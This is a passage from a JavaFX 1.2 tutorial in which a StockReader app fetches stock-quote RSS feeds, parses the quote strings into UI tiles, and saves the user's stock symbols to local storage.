onItem: function(item) { println("{item.title}"); } } feedTask.start(); } }; As shown in the preceding code, the variable symbols is a string sequence that holds the stock symbols for which the user wants to obtain feeds. These symbols will be hard-coded initially, but this article will later show you how to pass them in through UI elements. The startFeeds() function iterates over the sequence of stock symbols and runs an RSSTask for each. The stock symbol, {s}, is then passed into the location URL. Each RSSTask uses the interval variable of 30s. This causes the RSSTask to run every 30 seconds, so the end user receives frequent updates to any changes in the stock price. The RSSTask class inherits onException, which is used in this application to print not only the exception that was received but also the stock symbol that caused the exception. This article will expand on more uses of the onException variable later. The other two variables used in the feed task are onChannel and onItem. For now, both print their object's title to the console to demonstrate the basic workings of the RSSTask. The next example will demonstrate how to cut out the information provided in these strings and use them in UI elements. In order to pass in the stock symbols and run the RSSTasks, the example contains the following Main file: import stockreader.model.StockReaderModel; // This example uses the Singleton pattern. var model = StockReaderModel.getInstance(); model.symbols = ["GOOG", "AAPL", "MSFT"]; model.startFeeds(); Running the Main file provides the console output shown in Figure 1. As the application continues to run, the feeds update every 30 seconds and print out their new item.titleS. Without any kind of user interface, however, the application is quite boring and does not have much use. Now, the StockReader will get a UI allowing users to define the stocks that they would like to watch. This article will also demonstrate the use of Java technology to "scrape out" the parts of the title string to be used in the UI. Table 1 provides an outline of the variables used in the StockReader example application. As noted in the previous section, the information returned in the feed from QuoteRSS.com is one long string: QuoteRSS.com: MSFT: 25.16 at 10:34am 9/21/2009 That is not very helpful if the application's user interface (UI) needs to use and display specific parts of that string to the end user. This is where combining the Java and JavaFX script technologies comes in very handy. The following code is a function created to "scrape out" the elements needed for the StockReader application. public function parseTitleString(inContent:String, symbol:String):String[] { def startTitle = "QuoteRSS.com: {symbol}: "; def endTitle = ""; var begPos = 0; var endPos = 0; var retStr:String; var stockElements:String[]; begPos = inContent.indexOf(startTitle) + startTitle.length(); if (begPos >= 0) { endPos = inContent.indexOf(endTitle, begPos) - 1; retStr = inContent.substring(begPos); } stockElements = retStr.split(" "); return stockElements; } This code allows you to pass in the item's title -- for example, the long string at the beginning of this section -- then to skip over the URL and stock symbol at the beginning of the string, and to split the remaining elements in between each space. For instance, passing in the quote for that MSFT update of QuoteRSS.com: MSFT: 25.16 at 10:34am 9/21/2009 would provide the following: ["25.16","at","10:34am","9/21/2009"] Now that the application can break the information down to what it needs, a face-lift of the UI is in order, as shown in Figure 2. Each of the white squares in Figure 2 is a StockItemNode. Using the new layout class Tile, which was demonstrated in the previous article, the StockItemNodes are aligned horizontally and vertically in a tablelike format, wrapping to a new row once the nodes reach the width of the Tile. In this example, the StockItemNode has its own data model, a StockItem, which is very simple: package stockreader.model; public class StockItem { public var stockSymbol:String; public var price:String; public var time:String; public var date:String; } At this point, you can modify the RSSTask from the previous section to do something other than print to the console. For each stock symbol in the model, the application will create a StockItem, as seen in the stockItems variable in the following code sample. Instead of running an RSSTask for each symbol, the code is modified to run for each StockItem. The data returned from the RSSTask will be assigned the StockItem variables shown in the previous code sample. Take a look at the model's new RSSTask: public class StockReaderModel { var feedTask:FeedTask; public var symbols:String[]; public var stockItems:StockItem[]= bind for (s in symbols) StockItem { stockSymbol: s }; /** * A function that will run a feed for each stock symbol, * and create a StockItem data model for each. */ public function startFeeds():Void { for (si in stockItems) { println("symbol is {si.stockSymbol}"); feedTask = RssTask { location: "{si.stockSymbol}&frmt=0&Freq=0" interval: 60m onException: function(e) { println("Exception is: {e}"); si.price = "{indexof si + 1}"; si.time = "Feed Error"; si.date = "Feed Error"; } onChannel: function(channel) { println("{channel.title}"); } onItem: function(item) { println("{item.title}"); si.price = parseTitleString(item.title, si.stockSymbol)[0]; si.time = parseTitleString(item.title, si.stockSymbol)[2]; si.date = parseTitleString(item.title, si.stockSymbol)[3]; } onDone: function():Void { feedTask.stop(); } } feedTask.start(); } }; Note that the interval variable in the code sample has been changed to 60m, 60 minutes. You must assign a value to this variable in order for the RSSTask to work properly. In this case, it is not desirable that the feed tasks run continually, because the stocks themselves are not updated at specific intervals. Therefore, it would make more sense to have the user "refresh" the stocks when desired. Because the interval variable must be set, this application uses a large time interval of 60 minutes and stops the feed, feedTask.stop();, in the RSSTask's onDone event handler. But the application becomes much more useful if the end user is able to specify which stocks to watch. We added controls to allow the user either to choose from a list of predefined popular stocks or add some stocks by using a text box. When the user adds a stock symbol, that symbol is added to the symbols variable in the model, and the startFeeds() function is called, adding a new StockItemNode to the UI. Figure 3 shows the open dialog box and controls. Sometimes an error occurs in the RSS feed. As noted in the previous section, there are many uses for the onException variable in the RSSTask. In this application, if the feed for a stock causes an error, we want to make sure that the user sees something, even if it is not the correct data. Look at the following snippet of code, and you'll notice that the StockItems variables are still assigned something, but the update time and date now show "Feed Error." This way, the user knows that something is wrong. onException: function(e) { println("Exception is: {e}"); si.price = "{indexof si + 1}"; si.time = "Feed Error"; si.date = "Feed Error"; } The StockReader application now has a UI that allows the user to add and delete stocks, and to update the stocks using the refresh button. The next step is very important in this kind of application: local storage. The ability to store a user's data is an incredibly useful feature and, in many cases, a requirement. In this article's example application, users would get frustrated if they had to add the same stocks every time they ran the program. Therefore, locally storing the user's stocks and loading them on startup would make the application both easier to use and more effective. First, take a look at the saveProperties() function in the following code snippet: var entry:Storage; public function saveProperties():Void { println("Storage.list():{Storage.list()}"); entry = Storage { source: "stockreader.properties" }; var resource:Resource = entry.resource; var properties:Properties = new Properties(); def symbolsTemp = for (symbol in symbols) "{symbol},"; println("symbolsTemp looks like this: {symbolsTemp}"); properties.put("symbolsTemp", "{symbolsTemp}"); try { var outputStream:OutputStream = resource.openOutputStream(true); properties.store(outputStream); outputStream.close(); println("properties written"); } catch (ioe:IOException) { println("IOException in saveProperties:{ioe}"); } }; The Storage class contains two important variables that are used in the previous snippet: source and resource. The source variable is simply the path to the resource. In this example, it is a filename: stockreader.properties. The source can also be the absolute path to the resource, starting with /. A Resource is what will be stored on the platform, similar to a file. In the previous example, the stock symbols will be the resource. A very important note is that the symbols used in the program are in a String array. When this sequence of strings is stored, it becomes a single string. For example, ["AAPL","MSFT","GOOG"] becomes "AAPLMSFTGOOG". In preparation for this, the constant symbolsTemp is defined, creating a comma-separated list of symbols: "AAPL,MSFT,GOOG". This will make the stored symbols easy to split apart when loaded, and it will ensure that there are no extra spaces or characters when the symbols are stored. Table 2 and Table 3 outline the variables and functions of the Storage and Resource classes that are used in the StockReader example application. The Properties class is defined by the JavaFX 1.2 API as a "utility class for accessing and storing name/value pairs." The example creates a new instance of the Properties class and creates a name/value pair for symbolsTemp. The put() function is passed a key:String, which is a name for the value to be stored, and a value:String, which in this case is symbolsTemp. Now that things are set up, it's time to try storing the data using the resource's openOutputStream(overwrite:Boolean):OutputStream function, which defines whether to overwrite existing data and returns an OutputStream. Use this line of code: var outputStream:OutputStream = resource.openOutputStream(true); The code of ..., provides a reference to the resource's OutputStream. Finally, the application calls properties.store(outputStream), which stores the symbolsTemp resource that we put away in the last paragraph, then closes the outputStream. Remember always to close any and all OutputStreams that you opened. Table 4 provides a list of useful variables and functions for the Properties class. Obviously, we have to trigger the saveProperties() function at some point. The following two code samples demonstrate saving properties and exiting by using the close() and FX.addShutdownAction() functions. closeButton = Button { text: "Exit Program" action: function():Void { model.saveProperties(); stage.close(); } } FX.addShutdownAction(function():Void { if (Alert.question("Save your stocks for next time?")) { model.saveProperties(); } }) Now that the symbols have been locally stored, they need to be loaded the next time that the user runs the application. For this, a loadProperties() function was created: public function loadProperties():Void { println("Storage.list():{Storage.list()}"); entry = Storage { source: "stockreader.properties" }; var resource:Resource = entry.resource; var properties:Properties = new Properties(); try { var inputStream:InputStream = resource.openInputStream(); properties.load(inputStream); inputStream.close(); def symbolsTemp = properties.get("symbolsTemp"); if (symbolsTemp != null and symbolsTemp.trim() != "") { symbols = symbolsTemp.split(","); } else { symbols = []; } } catch (ioe:IOException) { println("IOException in loadProperties:{ioe}"); } }; Notice that the beginning of this function is identical to the saveProperties() function. The application still needs a reference to the existing Storage, "stockreader.properties", the resource, and an instance of the Properties class in order to create an InputStream for loading the stored data. This time, the application will create a variable of type InputStream and assign it the resource's openInputStream() function, which returns an InputStream. It then calls properties.load(inputStream), which loads the name/value pair discussed earlier. Now that we have the comma-separated list of symbols, symbolsTemp, it's time to split them apart and assign them to the model's symbol variable, which is used by the RSSTasks. Another important feature of data-storing applications is the ability to clear the user's data. The Storage class provides two functions for clearing the application's stored data: clear() and clearAll(). As their names suggest, clear() deletes a single resource from Storage, and clearAll() deletes all stored items or files. Following is a clearProperties()function that is called when the user clicks a "Clear Cache" button in the UI, which is shown in Figure 4. public function clearProperties():Void { if (entry != null) { entry.clearAll(); delete symbols; println("Properties cleared"); } }; Finally, the following code sample, located in the Main file, shows how the application invokes the loadProperties() function. function run():Void { model.loadProperties(); if (sizeof model.symbols > 0) { model.startFeeds(); } stage = Stage { ... ... // ... EXTRA CODE REMOVED ... ... FX.addShutdownAction(function():Void { if (Alert.question("Save your stocks for next time?")) { model.saveProperties(); } }) } First, the application loads the stored data. Then, as long as an empty string was not returned and model.symbols actually contains a symbol, the RSSTasks are started and the UI is created, including StockItemNodes for the stored symbols. The ability to store data locally can benefit the end user in ways other than storing stock symbols. For instance, some applications are designed so that a window opens to the size that it was when the user last closed the application. Storage makes this incredibly simple, as demonstrated in the book Pro JavaFX Platform. Not only does JavaFX make it easy to invoke RSS feeds, the binding power of the platform easily allows you to update the UI with new information from feeds. Storing local data, an essential feature for most applications, is simple to integrate into your JavaFX code. The next article in this series will add another UI element to the StockReader example: JavaFX Charts. We welcome your participation in our community. Please keep your comments civil and on point. You can optionally provide your email address to be notified of repliesyour information is not used for any other purpose. By submitting a comment, you agree to these Terms of Use.
http://www.oracle.com/technetwork/articles/javafx/v1-2-rsscharts-139204.html
CC-MAIN-2014-15
refinedweb
2,814
56.15
How to install discord.py on pythonista. This post is deleted!last edited by @ccc I need some assistance on something I am almost done installing all the modules but I am confused on this. It says module "attr" has no attribute 's' Please provide the full error message, not just the last line. Try import attr print(attr.__file__) @ccc here You can see the whole thing on this I was asking for the text that is under the box with the two arrows in the upper right corner of the window. You can run @JonB's code in the Python REPL. We suspect that it will show you the path to a file in the local directory called attr.pyand its presence is preventing Python from finding a second file with the same name in the package. If this is the case, then rename the local file and try again.
https://forum.omz-software.com/topic/7296/how-to-install-discord-py-on-pythonista
CC-MAIN-2021-49
refinedweb
152
83.36
This article is based on Machine Learning in Action , published on February: - Java Tutorials - Java EE Tutorials - Design Patterns Tutorials - Java File IO Tutorials Introduction Gradient Ascent uses the whole dataset on each update. This is fine with 100 examples but, with billions of data points containing thousands of features, it is unnecessarily expensive in terms of computational resources. An alternative to this method is to update the weights using only one instance at a time. This is known as Stochastic Gradient Ascent. Stochastic Gradient Ascent is an example of an on-line learning algorithm. This is known as on-line because we can incrementally update the classifier as new data comes in rather than all at once. The all-at-once method is known as batch processing. Pseudocode for the Stochastic Gradient Ascent would look like: [code] Start with the weights all set to 1 For each piece of data in the dataset: Calculate the gradient of one piece of data Update the weights vector by alpha*gradient Return the weights vector[/code] The following listing contains the Stochastic Gradient Ascent algorithm. Listing 1 Stochastic Gradient Ascent [code] def stocGradAscent0(dataMatrix, classLabels): m,n = shape(dataMatrix) alpha = 0.01 weights = ones(n) for i in range(m): h = sigmoid(sum(dataMatrix[i]*weights)) error = classLabels[i] – h weights = weights + alpha * error * dataMatrix[i] return weights[/code] Stochastic Gradient Ascent is very similar to Gradient Ascent except that the variables h and error are now single values rather than vectors. There also is no matrix conversion so all of the variables are NumPy arrays. To try this out, enter the code from listing 1 into logRegres.py and enter the following in your Python shell: [code]>>> reload(logRegres) <module ‘logRegres’ from ‘logRegres.py’> >>> dataArr,labelMat=logRegres.loadDataSet() >>> weights=logRegres.stocGradAscent0(array(dataArr),labelMat) >>> logRegres.plotBestFit(weights)[/code] After executing the code to plot the best-fit line, you should see something similar to figure 1. The resulting best fit line is ok but certainly not great. If we were to use this as our classifier, we would misclassify one-third of the results. One way to look at how good the optimization algorithm is doing is to see if it is converging. That is, are the parameters reaching a steady value or are they constantly changing? I have taken the Stochastic Gradient Ascent algorithm in listing 1 and modified it to run through the dataset 200 times. The weights were then plotted in figure 2. Figure 2 shows how the weights change in our simple Stochastic Gradient Ascent algorithm over 200 iterations of the algorithm. Weight 2, labeled X2 in figure 2, takes only 50 cycles to reach a steady value, but weights 1 and 0 take much longer. An additional item to notice from this plot is that there are small periodic variations, even though the large variation has stopped. If you think about what is happening, it should be obvious that there are pieces of data that don’t classify correctly and cause a large change in the weights. We would like to see the algorithm converge to a single value rather than oscillate, and we would like to see the weights converge more quickly. The Stochastic Gradient Ascent algorithm of listing 1 has been modified to address the problems shown in figure 2, and this is given in listing 2. Listing 2 Modified Stochastic Gradient Ascent [code]def stocGradAscent1(dataMatrix, classLabels, numIter=150): m,n = shape(dataMatrix) weights = ones(n) for j in range(numIter): dataIndex = range(m) for i in range(m): alpha = 4/(1.0+j+i)+0.01 #1 randIndex = int(random.uniform(0,len(dataIndex)))#2 h = sigmoid(sum(dataMatrix[randIndex]*weights)) error = classLabels[randIndex] – h weights = weights + alpha * error * dataMatrix[randIndex] del(dataIndex[randIndex]) return weights #1 Alpha changes with each iteration #2 Update vectors are randomly selected[/code] The code in listing 2 is similar to that of listing 1. However, two things have been added to improve it. The first thing to note is in #1 alpha changes on each iteration. This will improve the oscillations that occur in the dataset seen in figure 2 or high-frequency oscillations. Alpha decreases as the number of iterations increases. However, it never reaches 0 because there is a constant term in #1. We need to do this so that, after a large number of cycles, new data still has some impact. Perhaps you are dealing with something that is changing with time. Then, you may want to let the constant term be larger to give more weight to new values. The second thing about the decreasing alpha function is that it decreases by 1/(j+i); j is the index of the number of times we go through the dataset, and i is the index of the example in the training set. This gives an alpha that is not strictly decreasing when j<<max(i). The avoidance of a strictly decreasing weight is shown to work in other optimization algorithms, such as simulated annealing as well. The second improvement in listing 1 appears in #2. Here, we are randomly selecting each instance to use in updating the weights. This will reduce periodic variations that we saw in figure 2. An optional argument to the function has also been added. If no third argument is given, then 150 iterations will be done. However, if a third argument is given, that will override the default. If you compare figures 2 and 3, you will notice two things. The first thing you may notice is that the coefficients in figure 3 do not show the regular motion as those in figure 2. This is due to the random vector selection of stocGradAscent1(). The second thing you will notice is that the horizontal axis is much smaller in figure 3 than in figure 2. This is because with stocGradAscent1() we can converge on weights much quicker. Here, we use only 20 passes through the dataset. Let’s see this code in action. After you have entered the code from listing 2 to logRegres.py, enter the following in your Python shell: [code]>>> reload(logRegres) <module ‘logRegres’ from ‘logRegres.py’> >>> dataArr,labelMat=logRegres.loadDataSet() >>> weights=logRegres.stocGradAscent1(array(dataArr),labelMat) >>> logRegres.plotBestFit(weights)[/code] You should see a plot similar to that in figure 4. The results are very similar to that of GradientAscent() but far fewer calculations are involved. The default number of iterations is 150, but you can change this by adding a third argument to stocGradAscent1() like: [code] >>> weights=logRegres.stocGradAscent1(array(dataArr),labelMat, 500)[/code] Summary In this article, we learned about Stochastic Gradient Ascent and how to make modifications to yield better results.
https://javabeat.net/stochastic-gradient-ascent/
CC-MAIN-2022-05
refinedweb
1,121
53.81
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. [8.0] Computed field with bulk write In official documentation, we have the following example for computed fields : total = fields.Float(compute='_compute_total') @api.depends('value', 'tax') def _compute_total(self): for record in self: record.total = record.value + record.value * record.tax On the guidelines, we can read : Be aware that this assignation will trigger a write into the database. If you need to do bulk change or must be careful about performance, you should do classic call to write My question is how can we do the bulk change ? Is it valid to add the decorator @api.multi over the compute function and do something like self.write() ? Hi Emanuel, Yes by using decorator @api.multi you can write bulk record of same model. If you are overriding write metho than you have to define decorator @api.multi This is the standard convention we always use multi for write because if write method is already overriden some where in custom module it will create singlton error if you not follow the multi api. Suggestion is to always use api.multi when write come to picture. Hope this will help. Rgds, Anil. Sorry, my question was not very clear. I wanted to know what should we do specifically for computed fields. Can we decorate the compute functions used in fields with @api.multi ? @Emanuel cino, Yes when you decorate your computational field with api.multi than it will auto trigger the that methods when the records will be loaded or any changes going to happen in any of record in the same model. About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/8-0-computed-field-with-bulk-write-87506
CC-MAIN-2017-13
refinedweb
318
66.33
It's a cold winter night in Villa Emfatica. A group of people is scattered across the rooms of the villa but not all of them are alive. The solution to the mystery hides in a model that conforms to the metamodel below. As you progress through the levels of the game, more details of the metamodel will be revealed to you. Use the Model Explorer to query the mystery model with EOL, answer the questions on the right and find the murderer! // We'll give you this one Person.all.size().println(); @namespace(uri="murdercase", prefix="") package murdercase; class House { val Person[*] people; } class Person { }
https://www.eclipse.org/epsilon/games/game.php?game=murdercase
CC-MAIN-2018-13
refinedweb
106
74.08
[gutsy] gtkspell segfaults when trying to set the language on gtk.TextView Bug Description Binary package hint: gramps susan@susan:~$ gramps ***MEMORY- Segmentation fault (core dumped) susan@susan:~$ see bug 116870 glibc By the way, my python was the newest version available on 15 June. It's segfaulting in aspell like so: (gdb) bt #0 0xb67ed76d in delete_ #1 0xb6801260 in ?? () from /usr/lib/ #2 0x756d2e42 in ?? () #3 0xb6801d36 in ?? () from /usr/lib/ #4 0xb6801d30 in ?? () from /usr/lib/ #5 0x08854bcc in ?? () #6 0x00000000 in ?? () This is most likely to be the gtkspell problem. If you can reproduce the gramps crash, try running the code below in terminal, without gramps. It should not crash if there's no bug. If this crashes then it's a gtkspell bug. $ python >>> import gtk >>> import gtkspell >>> import locale >>> lang = locale. >>> if lang == None: ... print "lang is None" ... success = False ... else: ... gtkspell. ... success = True ... >>> success True Sorry Alex, I'm getting that script failing in several way, lots of syntax trouble. Can you re-write it, test it on your system, and load it as an attachment? Thanks Duncan, It was meant to be typed in, it is only a few lines. If you want to cut/paste, here it is: 1. First start python 2. Run the stuff below import gtk import gtkspell import locale lang = locale. if lang == None: print "lang is None" else: gtkspell. Thanks Alex, how's this: bad news? duncan@ubuntu:~$ python Python 2.5.1 (r251:54863, May 27 2007, 15:55:14) [GCC 4.1.3 20070518 (prerelease) (Ubuntu 4.1.2-8ubuntu1)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import gtk >>> import gtkspell >>> import locale >>> lang = locale. >>> if lang == None: print "lang is None" ... else: gtkspell. ... Segmentation fault (core dumped) duncan@ubuntu:~$ ... and the script crashed python2.5 which kicked apport into life and gave us bug report 122477, anything useful there? No. It's not bad news for gramps. It clearly demonstrates the issue with "gtkspell" python module. Guessing from my past experience with this on Debian, it is not because of the python bindings but rather in gtkspell itself. However, I am not 100% sure, it's just a guess. just a standard crash report -- I didn't run the script mentioned above. I get the same Segmentation fault as Duncan. If Alex is right, and this is a gtkspell bug, where do we report it? Once it is reported, someone can link this bug to the gtkspell bug. I don't think there's an "if" here. The python script is pretty short, and the only thing that could have crashed it is "gtkspell" python module. This can be either a problem with python bindings for gtkspell: package python- Or this can be a gtkspell library problem: package libgtkspell0 The sensible thing would be to re-assign this bug report to python- I think the problem might be with aspell. #strace gramps ... access( open("/ access( open("/ access( open("/ fstat64(15, {st_mode= mmap2(NULL, 4096, PROT_READ| read(15, "# Standard keyboard data file\n\nq"..., 4096) = 100 read(15, "", 4096) = 0 close(15) = 0 munmap(0xb6c16000, 4096) = 0 --- SIGSEGV (Segmentation fault) @ 0 (0) --- +++ killed by SIGSEGV +++ Process 31893 detached I don't know if this help... Can you try this script instead of gramps? Just run $ strace python test.py with the attached test.py file. This script has nothing to do with gramps and should crash just the same. Just to show that this is not a gramps issue and should be dealt with by gtkspell folks. Here's the output on mu machine, just updated. For some reason I couldn't get it written to file, so I've lost some of the start of the output. Looks like same crash to me. Can we please drop the gramps thing now and work with the script? This issue just happened to cause gramps to crash too, but this is not gramps problem. The script demonstrates it clearly :-) We need someone from MOTU to take on either getting this fixed or re-packaging the current version unhooked from gtkspell. I don't think we should wait much longer if GRAMPS is to make it into Gutsy. Anyone able to take this on? Opened a bug at the GtkSpell page on SourceForge: http:// The problem is how this function is called. The GtkTextView is instanciated temporarely and is destroyed after the construction of the GtkSpell object, which triggers a destruction of the relevant parts needed by set_language. I personally would consider the call method wrong, but well. A solution is to bump the refcnt of the textview in the GtkExtra python module (found in gnome-python- So an immediate fix would be to move the gtk.TextView() into a temporary variable instead. With that it works even with the version of python-gtkspell currently in the archives. gtkspell is buggy in terms that no way of gathering the information "is a spell checker available for this language" is exposed, gnome-python-extras is buggy because it does not increase the refcounter of the textview and gramps was buggy because it tried to acquire the information in a bogus way. To fix the problem for real libgtkspell should be using a weak reference to the GtkTextView object, so that when the GtkTextView is destroyed GtkSpell is notified and removes the reference. gramps (2.2.8-1ubuntu2) gutsy; urgency=low [ Philipp Kern ] * Work around a bug in gnome-python-extras which caused a deallocation of the TextView in the check if a spell checker is present. (LP: #120569) [ Scott Kitterman ] * Corrected XSBC-Original- * Moved debhelper from Build-Depends-Indep to Build-Depends to satisfy lintian * Bumped standards version to 3.7.2 without further change -- Scott Kitterman <email address hidden> Tue, 25 Sep 2007 12:49:53 -0400 that's not a gnome-python-extras bug So I've worked around the issue in Gramps, but the fundamental problem remains. I'd appreciate it if someone who understands Gnome would figure out which is the correct upstream to point fingers at. It's like I said in comment 25. libgtkspell should be fixed. It's rather simple to fix using g_object_weak_ref API, but I don't have time. I am not an expert, but I do think this is a gnome-python-extras bug. A python object should live as long as there are any references held to it. In this case the Spell object still holds a reference to the TextView object. So the Spell object should increase the reference counter on the TextView. The "C" GtkSpell itself is not designed to live without a corresponding TextView. (gtkspell_detach even destroys the GtkSpell "C" object) One could argue about the approach used in gtkspell but as of now most of the functions depend on the view. The change suggested by Gustavo Carneiro would make gtkspell more robust against such situations, but I think it's a bigger change. In the test script above, if done correctly, the TextView would be destroyed automatically, when the GtkSpell object is destroyed. After the last line there is no reference hold to the GtkSpell object anymore and the GC would destroy them both. Philipp Kern: I would be interested in your code that tried to fix the issue in gnome-python- Is this bug related to bug #261596? Why is this bug still stuck on 'Fix released' and not actually committed? Thanks for the report Susan Cragin ,:// Sadly, I can only confirm that it is fixed in oneiric, since that is what I have now and I just checked. But it appears to be fixed. I did use gramps last year and had no trouble with it, so I assume it has been fixed for some time. I'd say safe to say fixed in Natty. I should say, I know that gramps works. If the fix worked by removing gtk-spell, then gtk-spell could still have problems, and I wouldn't know about them. But I suspect it's fixed because I have other programs that use gtk-spell and have had no problems. I also saw the following information in the terminal I started gramps from: /usr/share/ gramps/ Spell.py: 53: GtkWarning: gtk_text_ view_get_ buffer: assertion `GTK_IS_TEXT_VIEW (text_view)' failed Spell(gtk. TextView( )).set_ language( lang) gramps/ Spell.py: 53: GtkWarning: gtk_text_ buffer_ get_bounds: assertion `GTK_IS_TEXT_BUFFER (buffer)' failed Spell(gtk. TextView( )).set_ language( lang) gtkspell. /usr/share/ gtkspell.
https://bugs.launchpad.net/ubuntu/+source/gtkspell/+bug/120569
CC-MAIN-2015-18
refinedweb
1,414
74.39
Related link:… All this for pretty rich text editors, doesn’t seem worth it. I thought that the process would be as easy as: - Choose one of two widely used AJAX frameworks - Drop the right js file in the right directory - Include it in my master template - Write some js to render a rich-text editor component - (maybe) write some onclick code that took care of populating the proper form field In the end, it was a piece of cake, but getting to the solution took me hours. The Contenders I had anticipated that the scriptaculous or openrico people would’ve come up with some sort of rich text component by now, but I couldn’t find a rich-text editor in either project. The app already had a dependency on the prototype library, so I googled rich-text prototype library, but I couldn’t find anything worth looking at. After some research the two candidates I identified were: Dojo’s site seemed slicker, the documentation appeared to be more professional, and the fact that Dojo is the foundation of jot, made me favor it over FCKeditor. I’ve used FCKeditor before, I knew it worked, but I had never integrated it with a server-side framework. From what I could see, Dojo would provide much more than just a rich-text editor, Dojo is a whole collection of components, code, and widgets. That’s something I’m interested in, so…. Dojo Madness I proceeded to select Dojo, downloaded the Kitchen Sink distribution, and quickly hit a brick wall. I tried to integrate the dojo.widget.Editor into my system only to have the Firefox Javascript console tell me that the package couldn’t be loaded by Dojo. dojo.require() was failing. I then tailed the access.log, only to see that dojo was trying to load the modules from the wrong path. Here’s the central issue, in this particular application, the request path never maps to a real folder, and it appeared that the dojo library was attempting to find each package from a relative directory. So, while I included the dojo.js by referencing /resources/js/dojo/dojo.js, the library was trying to reference the dojo src tree relative to the request path. So, if my page was /member/edit.do?id=29922, Dojo was trying to load dojo.widget.Editor from /member/edit/src/widget/Editor.js when it should be trying to lod from /resources/js/dojo/src/widget/Editor.js. After some time screwing around with the dojo.js file, I stumbled on this piece of documentation. I can alter the path prefix that dojo uses to load a particular package with this syntax: setModulePrefix(modulePath, prefix). Great, so I played around with that for an hour, until I looked at the definition of this function in dojo.js. It is defined as setModulePrefix: function(module, prefix), and from what I could gather, the dojo documentation confused the order of the parameters. The documentation says “ dojo.setModulePrefix("src/", "dojo");” when it should be “ dojo.setModulePrefix("dojo", "src/");“. Note: I’m ready for someone from DOJO to correct me if I’m mistaken, but it appears that the documentation is wrong. I ended up setting the Module Prefix appropriately for “dojo”, but after another few hours, I couldn’t get the system to work properly because it couldn’t locate other components. I then proceeded to dive into the dojo.js (uncompressed) so I could start the laborious process of printing debug statements with alert(). This is the tedious downside of the new AJAX reality. I tried to load this sucker up in Venkman, but it just wasn’t cooperating. That’s when I started to realize that dojo was trying to load an iframe and a Flash movie called storage.swf for every request. I also couldn’t figure out how to change the path from which it expected to load this flash movie. IMO, this was just too much magic for my taste, all I wanted was a rich-text editor and now I’ve got Flash movies… I’m positive that other people have spent the time to get dojo working with Java, and I’d encourage them to post solutions to the comment area, but after losing five hours to Dojo, I decided that it was time to punt and go to FCKeditor. FCKeditor After my trial by Dojo, FCKeditor was a breath of fresh air. The 3 step installation process is a bit misleading, but getting the widget to render was a piece of cake. I could answer my own questions from the demo code, and I was up and running with working FCKeditor + Struts form in no time. I ued the code from html sample2 to replace the text area, and then I ussed the code from html sample8 to call GetXHTML() on an instance of the Editor. so, to sumarize, form loads, FCKeditor replaces a textarea, then onclick of the submit button populates that textarea with the XHTML from the FCKeditor. Step-by-step Integration - Download FCKeditor distribution, unpack it somewhere in your webapp. I unpacked mine in “resources/FCKeditor”. - Include the fckeditor.js as a script in your page <c:url <script type="text/javascript" src="${resDir}/FCKeditor/fckeditor.js"></script> - Find a struts form that already uses an html:textarea - To replace a textarea with an FCKeditor, here’s the script: <c:url <script type="text/javascript"> var oFCKeditor = new FCKeditor( 'notes' ) ; oFCKeditor.BasePath = "${fckEditorBase}" ; oFCKeditor.ToolbarSet = 'Basic' ; oFCKeditor.ReplaceTextarea() ; </script> - Put the following code in the onclick of your submit button: var oEditor = FCKeditorAPI.GetInstance('notes'); document.getElementsByName('notes')[0].value = oEditor.GetXHTML(true); Conclusion Please if I’m missing something about the Dojo configurtion, leave a comment. I’d prefer to use Dojo as a platform, and if someone has a soution to my absolute/relative path blues, please post it. But, in the meantime, I’m very happy with the simplicity of the FCKeditor-based solution. I can drop the FCKeditor straight into my application without having to modify anything on the server-side. Nice timing Thanks so much for writing about this. These sort of things have always been on my "want" list for older apps, but I was going to have to use it for an upcoming app and was always fearful of that often multi-hour, multi-day frustration period of exploring different products. It's great that you condensed it into a short and easy to read introduction! Clarification From Tim: "I realized that the article above leaves out some details. Realize that the struts form in question has a textarea: <html:textarea. If I can grab a free hour from childcare, I'll throw a tarball together with a workign example." TinyMCE TinyMCE is another editor which is very configurable, easy to integrate, and has a very active community around it. my observations on Xinha Great post - I've been struggling with integrating a wysiwyg tool into my web app and have found it to be an immensely frustrating experience. I'm definitely going to check out FCK. I've been struggling with Xinha over the last week and am about to throw in the towel. I was initially quite impressed with it but I've had to deal with some absolutely ridiculous problems like corrupted html entities, mangled links, an indentation style that drives IE insane and a couple of other things. All of this has ruined the confidence of the customer and myself in the ability of this product to maintain the integrity of the data. To be fair, it does have a lot of good points, it generates good XHTML and the performance is good. Unfortunately, configuration can be quite a bear. The Xinha support forums are littered with people asking for help and not much help is forthcoming. Ah, that turned into a rant. Sorry about that. I'm sure Xinha is great for a lot of uses, just not mine. my observations on Xinha Interesting, in general I think the frustration with these rich-text components is universal. What's crazy about rich editors is the amount of collective stress we've all spent trying to integrate them into our applications. I think it just points to the fact tht the intersection of browsers, Javascript, and server-side applications is still a blind spot irregargless of Web2.0 ...before someone chimes in with the obligatory "In rails everything is easy" message. I'll point to the fact that integrating rails and FCKeditor is a chore () . regarding Dojo I believe you would have found that had you emailed the mailing list with your issue, your time spent on Dojo would have been significantly less. Yes I know, you shouldn't have to, but on a project with documentation in development, it's a great substitute. To give you a hand, I believe these following tips will solve your problems with Dojo in your situation. 1) This link in our FAQ explains how to force Dojo to cooperate with Venkman for debugging purposes. 2) For your problem with dojo.require using the wrong file paths // Dojo configuration djConfig = { baseRelativePath: "/new/path/to/dojo/", }; This would need to be defined before your tag that loads dojo.js The method you were attempting to use is designed primarily to allow for people to write their own modules to dojo without intwining their code inside of the main Dojo src folders. For example you could load MochiKit using that method, and instead of dojo.mochi you could call MochiKit code using the "mochi." namespace instead of "dojo." As far as the manual being wrong it is entirely possible there is a mistake. What link did you find that reference on, I'll gladly verify and correct the problem if it is infact an error. Well I hope this answers your questions regarding Dojo, and gets you back on your feet with it. If you have any more problems, you can always bring them to the Dojo-interest list (info located here:) Good luck! -Karl regarding Dojo Agreed, mailing lists would've been a good avenue for questions. But, I think that my experience is representative of the majority of developers who need to intergrate library X with library Y and have a finite amount of attention Blogging tended to get a good answer relatively quickly. :-) thanks for the response. Despite the initial difficulties, dojo seems to me at least to be a clearer, more comprehesive AJAX alternative. I'm rooting for dojo. #2 in your response, seems like that note needs to be higher up in the documentation - maybe even a note in the getting started guide. Anyway, what am I saying, I should just submit a patch. As for the possible type: grep setModulePath on regarding 